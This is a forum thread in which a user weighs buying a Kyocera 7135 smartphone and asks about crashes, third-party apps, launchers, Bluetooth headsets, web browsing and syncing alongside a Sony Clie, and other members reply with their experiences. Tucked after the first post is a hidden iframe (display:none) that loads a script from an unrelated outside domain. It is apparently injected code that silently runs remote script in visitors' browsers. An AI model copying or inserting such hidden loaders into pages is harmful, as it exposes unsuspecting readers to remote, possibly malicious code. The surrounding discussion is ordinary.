+ Reply to Thread

Thread: Help ME!!!!!

Help ME!!!!!

I have the opportunity to buy the Kyocera 7135 tomorrow, but I have some reservations. First off, you should know that I am a techno-hedonist with more gadgets and gear than brains. I currently use a Sony NR70V and a Motorola V60. That said, I WANT A NEW PHONE!!!!!(I love my Clie though...) I've been bugging my local Verizon store for months, and a few days ago I caught wind of the 7135. I have been looking into jumping ship (Verizon) and signing up with At&t, solely for the cool hardware. I have been looking @ the Sony-Ericsson P800 (too cool!). Anyway, back to the 7135, I need some help deciding whether to take the plunge, and I have a few questions:

1.) I get that it's buggy, that it locks up and resets. Is this a problem?

2.) Can I safely load 3rd party apps. onto this device, or does that lead to question#1?

3.) How about games, replacement launchers, remote control software etc.?

4.) I recently bought a Jabra FreeSpeak w/the Bluetooth adapter, will it work with the 7135?

5.) Can I surf the web using one of it's 3 browsers? Is it a pleasant and well-worth-the-money experience?

If anyone can help me out, it's you guys! I've been lurking for a few days now, and you guys know your sh**!

TIA<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I also left a sony clie NR 70V for the 7135 and do not regret it for a minute. It is so convenient to always have both a pda and phone with me all the time and not look like a geek or have buldges everywhere. No more cables connecting to my startac.

All of my apps, launchers, etc. worked fine. It did find some of the clie software caused crashes when I just transferred everything over at once. So I did it app by app, deleting the clie specific stuff and have had NO problems at all.

Web browsing is easy on it. It did take a day or two to get used to the smaller screen than the clie. I did enlarge the fonts to help with that aspect.

You will be very happy with it!

Thanks for the prompt reply, what launcher are you using? I am currently using Yishow and love the ability to skin my Clie, can you skin a Kyocera? Also, I don't think I'm going to abandon my NR70V, so will both devices Hotsync on my PC? I assume you just create a new user-name and your'e done, am I right?

Thanks again all!

I use Launcher X without a problem. I used to use YiShow but prefer Laucnher X. You can hot sync both if you use 2 user names.
    Good luck!

AWESOME!! So do I need to install any of the software that comes with it? Or if I access the Hotsync manager and add a diff. user should it be good to go?

What limitations re. software have ya'll run into? I read that Kinoma needs tweaking, any others no worky?